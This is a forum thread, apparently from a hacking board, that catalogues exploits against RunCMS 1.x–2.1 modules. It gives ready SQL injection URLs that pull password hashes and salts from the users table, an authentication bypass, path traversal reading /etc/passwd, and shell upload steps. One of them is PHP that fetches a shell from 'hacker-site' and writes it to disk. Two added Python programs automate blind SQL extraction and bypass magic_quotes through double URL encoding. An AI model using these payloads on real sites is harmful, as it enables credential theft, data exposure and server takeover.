Request: /modules/HotNews/?op=printpage&tid=-1+union+select+1,2,pass,4+from+runcms_users
Vulnerable code fragment:
case "printpage":
PrintTutPage();
break;
..........
function PrintTutPage() {
global $xoopsConfig, $xoopsUser, $db, $myts, $HTTP_GET_VARS, $imgwidth, $imgheight;
$tid = $HTTP_GET_VARS['tid'];
$result=$db->query("select tname, timg, tcont, codes from ".$db->prefix("HotNews")." where tid=$tid");
list($tname, $timg, $tcont, $codes) = $db->fetch_row($result);
Vulnerable script: submit.php
Request: /modules/HotNews/submit.php?op=addTutorial&cid=-1+union+select+1,uname,pass,4+from+runcms_users
Vulnerable code fragment:
case "addTutorial":
addTutorial();
break;
.........
function addTutorial(){
global $db, $xoopsConfig, $xoopsUser, $HTTP_GET_VARS, $myts, $xoopsTheme;
include(XOOPS_ROOT_PATH."/header.php");
$cid = $HTTP_GET_VARS["cid"];
$createdir = $HTTP_GET_VARS["createdir"];
// Add new Tutorial ------------------//
$result=$db->query("select scid, cname, cdesc, cimg from ".$db->prefix("HotNews_categorys")." where cid=$cid");
list($scid,$cname,$cdesc,$cimg) = $db->fetch_row($result);
Shell upload
Vulnerable script: upload.php
The script does not check the file type / extension, so it may be possible to upload a shell into the images directory, or into any other one, by passing the corresponding path in the img_path variable
(Although on my local setup not even images would upload, so I couldn't verify it... still, even if the extension is checked, you can upload a shell with a .jpg extension but with img_path=/shell.php%00)
BlackSun
25.02.2009, 07:03
banners - a default RunCMS module
Version: 1.4
SQL-INJ
Vulnerable script: index.php
Requirement: magic_quotes = off
Requirement: the banners module is enabled
First we bypass authentication
Request [POST \ GET]: login=q' union select 1,2,3,0x3930303135303938336364323466623064363936336637643238653137663732#&pass=abc
where 0x3930303135303938336364323466623064363936336637643238653137663732 is the hash of abc, converted to a number.
Vulnerable code fragment:
switch ($_REQUEST['op']) {
case "bannerstats":
bannerstats($_POST['login'], $_POST['pass']);
break;
..........
function bannerstats($login, $pass) {
global $db, $myts, $xoopsConfig, $meta, $xoopsModule;
$sqlpass = md5($pass);
$result = $db->query("SELECT cid, name, login, passwd FROM ".$db->prefix("banner_clients")." WHERE login='$login' AND passwd='$sqlpass'");
list($cid, $name, $login, $passwd) = $db->fetch_row($result);
if ($sqlpass == $passwd) {
Moving on, let's get the admin's password:
Vulnerable code fragment:
$result = $db->query("SELECT bid, imptotal, impmade, clicks, datestart FROM ".$db->prefix("banner_items")." WHERE cid=$cid");
// $cid is one of the columns from the previous SQL query
while ( list($bid, $imptotal, $impmade, $clicks, $date) = $db->fetch_row($result) ) {
if ( ($impmade == 0) || ($clicks == 0) ) {
$percent = 0;
} else {
$percent = round(100 * ($clicks/$impmade), 2);
}
if ( $imptotal == 0 ) {
$left = _BN_UNLIMITED;
} else {
$left = ($imptotal-$impmade);
}
echo "
<td class='center'>$bid</td>
We get the injections for the second MySQL query:
-1 union select uname,0,0,0,0 from runcms_users limit 0,1
-1 union select pass,0,0,0,0 from runcms_users limit 0,1
-1 union select pwdsalt,0,0,0,0 from runcms_users limit 0,1
Convert to a number:
uname: 0x2d3120756e696f6e2073656c65637420756e616d652c302c302c302c302066726f6d2072756e636d735f7573657273206c696d697420302c31
pass: 0x2d3120756e696f6e2073656c65637420706173732c302c302c302c302066726f6d2072756e636d735f7573657273206c696d697420302c31
pwdsalt: 0x2d3120756e696f6e2073656c6563742070776473616c742c302c302c302c302066726f6d2072756e636d735f7573657273206c696d697420302c31
The complete request in total:
login=q' union select 0x2d3120756e696f6e2073656c65637420756e616d652c302c302c302c302066726f6d2072756e636d735f7573657273206c696d697420302c31,2,3,0x3930303135303938336364323466623064363936336637643238653137663732#&pass=abc
BlackSun
25.02.2009, 09:00
messages - a default RunCMS module
Version: 1.02
Blind SQL-INJ
Vulnerable scripts: read.php and readsend.php
Character-by-character brute force
Request: /modules/messages/read.php?start=0&total_messages=1&sort=msg_time+and+(select+ascii(substring(pass,1,1))+from+runcms_users+limit+0,1)>100&by=DESC
Vulnerable code fragment:
// read.php
$start = intval($_REQUEST['start']);
$total_messages = intval($_REQUEST['total_messages']);
$sort = $_GET['sort'];
$by = $_GET['by'];
$pm_arr =& PM::getAllPM(array("to_userid=".$xoopsUser->getVar("uid").""), true, $sort, $by, 1, $start);
// pm.class.php
function &getAllPM($criteria=array(), $asobject=false, $sort='msg_time', $order='ASC', $limit=0, $start=0) {
global $db;
$ret = array();
$where_query = '';
if ( is_array($criteria) && count($criteria) > 0 ) {
$where_query = " WHERE";
foreach ( $criteria as $c ) {
$where_query .= " $c AND";
}
$where_query = substr($where_query, 0, -4);
}
if ( !$asobject ) {
$sql = "SELECT msg_id FROM ".$db->prefix("private_msgs")."$where_query ORDER BY $sort $order";
$result = $db->query($sql, $limit, $start);
while ( $myrow = $db->fetch_array($result) ) {
$ret[] = $myrow['msg_id'];
}
} else {
// as we can see, ORDER BY gets in our way =\
$sql = "SELECT * FROM ".$db->prefix("private_msgs")."".$where_query." ORDER BY $sort $order";
$result = $db->query($sql, $limit, $start);
while ( $myrow = $db->fetch_array($result) ) {
$ret[] = new PM($myrow);
}
}
return $ret;
}
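Blind extraction through that ORDER BY, as an added example that is not part of the post or of RunCMS. It replays getAllPM() against an in-memory SQLite database with constructed rows, so the oracle uses SQLite's unicode()/substr()/length() where MySQL has ascii()/substring()/length(); table layouts and the sample rows are assumptions. It also goes beyond the post's `msg_time and (...)>100` payload: the injected sort key is a CASE expression that sorts by msg_id when the condition holds and by -msg_id otherwise, so the first row returned is a clean true/false signal, and a binary search over the character range recovers each byte in about seven requests instead of trying every value.

```python
import sqlite3


def seed() -> sqlite3.Connection:
    """Constructed sample data (assumed layouts; the real tables carry the
    RunCMS prefix and many more columns)."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE private_msgs(msg_id INTEGER, to_userid INTEGER, msg_time INTEGER);
        CREATE TABLE runcms_users(uname TEXT, pass TEXT, pwdsalt TEXT);
        INSERT INTO private_msgs VALUES (1, 5, 100), (2, 5, 200), (3, 5, 300);
        INSERT INTO runcms_users VALUES ('admin', 'dd94709528bb1c83d08f3088d4043f4742891f4f', '153a');
        """
    )
    return db


def get_all_pm(db: sqlite3.Connection, uid: int, sort: str, order: str) -> list:
    """Mirror of PM::getAllPM(): $sort and $order land in ORDER BY verbatim."""
    sql = (f"SELECT msg_id FROM private_msgs WHERE to_userid={uid} "
           f"ORDER BY {sort} {order}")
    return [r[0] for r in db.execute(sql).fetchall()]


class Oracle:
    """Boolean oracle built on the injectable sort key. Needs at least two
    messages in the victim's inbox so that the order is observable."""

    def __init__(self, db: sqlite3.Connection, uid: int = 5):
        self.db, self.uid, self.queries = db, uid, 0

    def ask(self, cond: str) -> bool:
        # Under DESC the key msg_id puts the highest id first when cond is
        # true, while -msg_id puts the lowest id first when it is false.
        sort = f"(CASE WHEN ({cond}) THEN msg_id ELSE -msg_id END)"
        self.queries += 1
        rows = get_all_pm(self.db, self.uid, sort, "DESC")
        return rows[0] == max(rows)

    def value_of(self, expr: str, lo: int, hi: int) -> int:
        """Binary search for the integer value of expr within [lo, hi]."""
        while lo < hi:
            mid = (lo + hi) // 2
            if self.ask(f"{expr} > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        return lo

    def extract(self, column: str, table: str, row: int = 0, maxlen: int = 64) -> str:
        """Read one text cell: its length first, then each printable character."""
        cell = f"(SELECT {column} FROM {table} LIMIT 1 OFFSET {row})"
        length = self.value_of(f"length({cell})", 0, maxlen)
        chars = [chr(self.value_of(f"unicode(substr({cell}, {i}, 1))", 32, 126))
                 for i in range(1, length + 1)]
        return "".join(chars)


if __name__ == "__main__":
    o = Oracle(seed())
    for col in ("uname", "pass", "pwdsalt"):
        print(col, o.extract(col, "runcms_users"))
    print("requests:", o.queries)
```

Against the real module each ask() is one GET to read.php with the CASE expression in the sort parameter and the first msg_id read off the page; the query counter shows what a 40-character hash costs at seven comparisons per character.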
BlackSun
27.02.2009, 16:22
Members List
Version: 1.1
Vulnerable script: index.php
Request: /modules/memberslist/index.php?query=!')+union+select+1,pass+from+runcms_users%23
Vulnerable code fragment:
if ( isset($query) ) {
$where = "WHERE level>0 AND (uname LIKE '%$query%' OR user_icq LIKE '%$query%' ";
$where .= "OR user_from LIKE '%$query%' OR user_sig LIKE '%$query%' ";
$where .= "OR user_aim LIKE '%$query%' OR user_yim LIKE '%$query%' OR user_msnm like '%$query%'";
if ( $xoopsUser ) {
if ( $xoopsUser->isAdmin() ) {
$where .= " OR email LIKE '%$query%'";
}
}
$where .= ") ";
} else {
$where = "WHERE level>0";
}
$result = $db->query("SELECT uid, uname FROM ".$db->prefix("users")." $where ORDER BY uid DESC",1,0);
list($lastuid, $lastuser) = $db->fetch_row($result);
BlackSun
27.02.2009, 18:39
Arcade
Version: 0.51
Vulnerable script: index.php
Request: /modules/arcade/index.php?act=show_cat&cat_id=-1+union+select+1,pwdsalt,pass,4,uname,6,7,8,9,10,11,12,13,14,15+from+runcms_users%23
Vulnerable code fragment:
switch($act)
{
case 'show_cat':
{
show_category($cat_id);
break;
}
...........
// /include/arcade_func.php
function _show_cat_games($cat_id)
{
global $db, $HTTP_GET_VARS, $options;
$sql = "SELECT * FROM ".$db->prefix('arcade_cats')." WHERE cat_id=$cat_id";
$res = $db->query($sql);
$catrow = $db->fetch_object($res);
$sql1 = "SELECT count(*) from ".$db->prefix('arcade_games')." WHERE cat_id=$cat_id AND active=1 order by gtitle";
$res1 = $db->query($sql1);
list($total_games) = $db->fetch_array($res1);
$pager = new PageNav($total_games, $options['games_per_page'], $HTTP_GET_VARS['start'], "start", "act=show_cat&cat_id=$cat_id");
$sql2 = "SELECT * from ".$db->prefix('arcade_games')." WHERE cat_id=$cat_id AND active=1 order by gtitle";
$res2 = $db->query($sql2, $options['games_per_page'], $HTTP_GET_VARS['start']);
if ($catrow->cat_info) { $boxstuff = "<center><h1>".$catrow->cat_info."</h1></center><br />";}
if ($pager->renderNav()) { $boxstuff .= "<center>".$pager->renderNav()."</center><br />";}
$title= _MD_DISPCAT.$catrow->cat_name;
while ($row = $db->fetch_object($res2))
{
$boxstuff .=_display_game_info($row);
}
if ($pager->renderNav()) { $boxstuff .= "<br /><center>".$pager->renderNav()."</center>";}
themecenterposts($title, $boxstuff);
}
Request: /modules/arcade/index.php?act=play_game&gid=-1+union+select+1,pwdsalt,3,4,uname,6,7,8,9,10,11,12,pass,14,15+from+runcms_users%23
Vulnerable code fragment:
case 'play_game':
{
play_game($gid);
break;
}
.....
// /include/arcade_func.php
function play_game($gid)
{
......
swf_display($gid);
......
function swf_display($gid)
{
global $db;
$sql = "SELECT * from ".$db->prefix('arcade_games')." WHERE gid=".$gid;
$res = $db->query($sql);
Request: /modules/arcade/index.php?act=show_stats&gid=-1+union+select+pass,2+from+runcms_users%23
Vulnerable code fragment:
case 'show_stats':
{
show_gamestats($gid);
break;
}
.......
function show_gamestats($gid)
{
OpenTable();
_display_gamestats($gid);
CloseTable();
}
.......
function _display_gamestats($gid)
{
global $db, $HTTP_POST_VARS, $xoopsUser, $options;;
$sql = "SELECT gtitle,highscore_type FROM ".$db->prefix('arcade_games')." WHERE gid=".$gid."";
$res = $db->query($sql);
Arbitrary file read
Requirement: magic_quotes = off
Request: /modules/arcade/index.php?act=download_game&game=/../../../../../../../../../../../../../../../../../../../etc/passwd%00
Vulnerable code fragment:
case 'download_game':
{
download_game($game);
break;
}
.....
function download_game($game)
{
global $HTTP_POST_VARS, $xoopsUser;
$dir = XOOPS_ROOT_PATH."/modules/arcade/cache/tar/";
$file = $dir."game_".$game.".tar";
$dir2 = XOOPS_ROOT_PATH."/modules/arcade/tar/";
$file2 = $dir2."game_".$game.".tar";
if ( !@file_exists($file) && !@file_exists($file2) )
{
new_tar($game);
} else {
header("Pragma: public");
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
header("Cache-Control: public");
header("Content-Description: File Transfer");
header('Content-type: application/x-tar');
$header="Content-Disposition: attachment; filename=game_".$game.".tar";
header($header );
header("Content-Transfer-Encoding: binary");
@readfile($file);
}
}
I'll stop here with this module; what follows is more of the same injections...
BlackSun
27.02.2009, 19:05
Book Reviews
Version: 0.3
Vulnerable script: index.php
Request:
/modules/mareviews/?func=catlist&category=%252d%2531%2527%2520%2575%256e%2569%256f%256e%2520%2573%2565%256c%2565%2563%2574%2520%2563%256f%256e%2563%2561%2574%255f%2577%2573%2528%2530%2578%2533%2561%252c%2570%2561%2573%2573%252c%2570%2577%2564%2573%2561%256c%2574%2529%252c%2575%256e%2561%256d%2565%252c%2533%2520%2566%2572%256f%256d%2520%2572%2575%256e%2563%256d%2573%255f%2575%2573%2565%2572%2573%2523
Vulnerable code fragment:
function show_catlist($category) {
global $isbn, $title, $db;
// and thanks to this, concat can be used for glamour,
// and magic_quotes can be forgotten about...
// ...by URL-encoding the injection twice
$category = urldecode($category);
$table = $db->prefix()."_mareviews";
/*
* Set display title
*/
$box_title = $category." - Reviews";
$content = "<table>";
$sql = "
SELECT title, author, id
FROM $table
WHERE category = '$category'
ORDER BY author, title";
$result = $db->query($sql);
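What that urldecode() buys the attacker, as an added example that is not part of the post or of the module. The code simulates the request path of show_catlist(): PHP decodes the GET value once when it fills $_GET, magic_quotes_gpc runs addslashes() over it, and the script then decodes it a second time, so a quote that was %2527 on the wire is still %27 when addslashes() looks at it and only turns into a real quote afterwards. The query runs against an in-memory SQLite database with constructed rows, which is why the payload uses SQLite's || and -- where the post uses MySQL's concat_ws() and #; table and column names are assumptions. SQLite does not treat a backslash as an escape, so the simulation converts MySQL's \' into SQLite's '' before executing, which keeps the meaning MySQL would give the escaped value.

```python
import sqlite3
from urllib.parse import quote, unquote

# SQLite flavour of the post's payload (|| instead of concat_ws, -- instead of #).
PAYLOAD = "-1' union select pass || ':' || pwdsalt, uname, 3 from runcms_users --"


def addslashes(s: str) -> str:
    """PHP addslashes(), which magic_quotes_gpc applies to every GET value."""
    return (s.replace("\\", "\\\\").replace("'", "\\'")
             .replace('"', '\\"').replace("\x00", "\\0"))


def mysql_escapes_to_sqlite(s: str) -> str:
    """Simulation only: give MySQL-style backslash escapes the meaning MySQL
    would give them, using SQLite's '' quoting for an escaped quote."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "\\" and i + 1 < len(s):
            out.append("''" if s[i + 1] == "'" else s[i + 1])
            i += 2
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def encode(payload: str, times: int) -> str:
    """URL-encode the payload the given number of times (1 = normal, 2 = double)."""
    for _ in range(times):
        payload = quote(payload, safe="")
    return payload


def seed() -> sqlite3.Connection:
    """Constructed sample data (assumed layouts)."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE runcms_mareviews(title TEXT, author TEXT, id INTEGER, category TEXT);
        CREATE TABLE runcms_users(uname TEXT, pass TEXT, pwdsalt TEXT);
        INSERT INTO runcms_mareviews VALUES ('Dune', 'Herbert', 1, 'scifi');
        INSERT INTO runcms_users VALUES ('admin', 'dd94709528bb1c83d08f3088d4043f4742891f4f', '153a');
        """
    )
    return db


def show_catlist(db: sqlite3.Connection, wire_value: str, magic_quotes: bool = True) -> list:
    """Mirror of show_catlist() from the GET value on the wire to the rows it returns."""
    category = unquote(wire_value)         # PHP populates $_GET (one decode)
    if magic_quotes:
        category = addslashes(category)    # magic_quotes_gpc = On
    category = unquote(category)           # the module's own urldecode($category)
    category = mysql_escapes_to_sqlite(category)
    sql = (f"SELECT title, author, id FROM runcms_mareviews "
           f"WHERE category = '{category}' ORDER BY author, title")
    return db.execute(sql).fetchall()


if __name__ == "__main__":
    db = seed()
    print("single-encoded, magic_quotes on :", show_catlist(db, encode(PAYLOAD, 1)))
    print("double-encoded, magic_quotes on :", show_catlist(db, encode(PAYLOAD, 2)))
    print("single-encoded, magic_quotes off:", show_catlist(db, encode(PAYLOAD, 1), False))
```

Single-encoded, the quote is escaped and the whole payload stays inside the string literal, so the query returns nothing; double-encoded, addslashes() sees only %27 and the second decode hands the raw quote to the query, which is exactly the case where magic_quotes no longer matters.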
Player#1
08.04.2010, 14:39
RunCMS 2.1
Active XSS
http://yoursite/edituser.php
Field address varchar(150)
Field town varchar(60)
Shell upload via the admin panel
http://yoursite/modules/system/admin.php?fct=tpleditor
Upload a zip archive containing the shell.
The shell will be uploaded to: http://yoursite/themes/shell.php
---------------------------------------------------------
http://yoursite/modules/system/admin.php?fct=blocksadmin
Add a new block:
Content - paste the shell include here, for example:
$str = file_get_contents("http://hacker-site/shell.txt");
$fp = fopen("shell.php", "w+t");
fwrite($fp, $str);
Content Type - PHP Script
Open a page containing the block or view its preview.
The shell will be written to: http://yoursite/modules/system/shell.php
Player#1 (c)
.:[melkiy]:.
13.05.2010, 15:19
Run CMS 2.1
www.runcms.org
SQL-Injection
file:/modules/forum/reply.php
include_once("class/class.forumposts.php");
$forumpost = new ForumPosts($post_id);
file:/modules/forum/class/class.forumposts.php
function ForumPosts($id=-1) {
if ( is_array($id) ) {
$this->makePost($id);
} elseif ( $id != -1 ) {
$this->getPost($id);
}
}
...
function getPost($id) {
...
$sql = "SELECT * FROM ".$bbTable['posts']." WHERE post_id=$id";
$array = $db->fetch_array($db->query($sql));
...
result:
GET /modules/forum/reply.php?forum=3&post_id=-4+union+select+1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17,18&topic_id=4&viewmode=flat&order=0
LFI
need: administrator account, mq=off
/modules/system/admin.php?fct=tpleditor&op=file_edit&module=../../../[local_file]%00
/modules/system/admin.php?fct=tpleditor&op=css_edit&module=../../[local_file]%00
/modules/system/admin.php?fct=tpleditor&op=tpl_module_edit&module=../../[local_file]%00&tpl=1
Full Path Disclosure
/footer.php
/header.php
/class/core.php
/class/groupaccess.php
/class/rcxblock.php
/class/rcxcomments.php
/class/rcxformloader.php
/class/rcxgroup.php
/class/rcxpm.php
/class/rcxstory.php
/class/rcxtopic.php
/class/rcxuser.php
/class/database/mysql.php
/class/form/formbutton.php
/class/form/formcheckbox.php
/class/form/formdatetime.php
/class/form/formdhtmleseditor.php
/class/form/formdhtmlfckeditor.php
/class/form/formdhtmltextarea.php
/class/form/formelementtray.php
/class/form/formfile.php
/class/form/formheadingrow.php
/class/form/formhidden.php
/class/form/formlabel.php
/class/form/formpassword.php
/class/form/formradio.php
/class/form/formradioyn.php
/class/form/formselect.php
/class/form/formselectcountry.php
/class/form/formselectgroup.php
/class/form/formselectlang.php
/class/form/formselectmatchoption.php
/class/form/formselectmodule.php
/class/form/formselecttheme.php
/class/form/formselecttimezone.php
/class/form/formselectuser.php
/class/form/formtext.php
/class/form/formtextarea.php
/class/form/formtextdateselect.php
/class/form/simpleform.php
/class/form/tableform.php
/class/form/themeform.php
upload shell
need: administrator account
Log in... go to System Admin -> Theme Editor -> zip the shell (*.zip) -> click upload
the shell will be available at http://site.ru/themes/shell.php
.:[melkiy]:.
13.05.2010, 18:21
Run CMS 2.1
SQL-Injection
need: user account
file:/modules/pm/print.php
if ( isset($_POST['op']) ) {
$op = $_POST['op'];
} elseif ( isset($_GET['op']) ) {
$op = $_GET['op'];
}
if ( isset($_POST['msg_id']) ) {
$msg = $_POST['msg_id'];
} elseif ( isset($_GET['msg_id']) ) {
$msg = $_GET['msg_id'];
}
if (empty($msg)) {
redirect_header("index.php", 2, _PM_NOPNTOPRINT);
exit();
}
if ($op == "print_pn") {
$sql = "SELECT msg_id, subject, from_userid, to_userid, msg_time, msg_text FROM ".$db->prefix("pm_msgs")." WHERE msg_id=".$msg." ";
}
if ($op == 'print_sent_pn') {
$sql = "SELECT msg_id, subject, from_userid, to_userid, msg_time, msg_text FROM ".$db->prefix("pm_msgs_sent")." WHERE msg_id=".$msg."";
}
result:
/modules/pm/print.php?op=print_pn&msg_id=-0+union+select+1,2,3,4,5,6
--------------
/modules/forum/edit.php?forum=1&post_id=-1+union+select+1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17,18&topic_id=4&viewmode=flat&order=0
/modules/galleri/viewcat.php?cid=-1+union+select+1,version()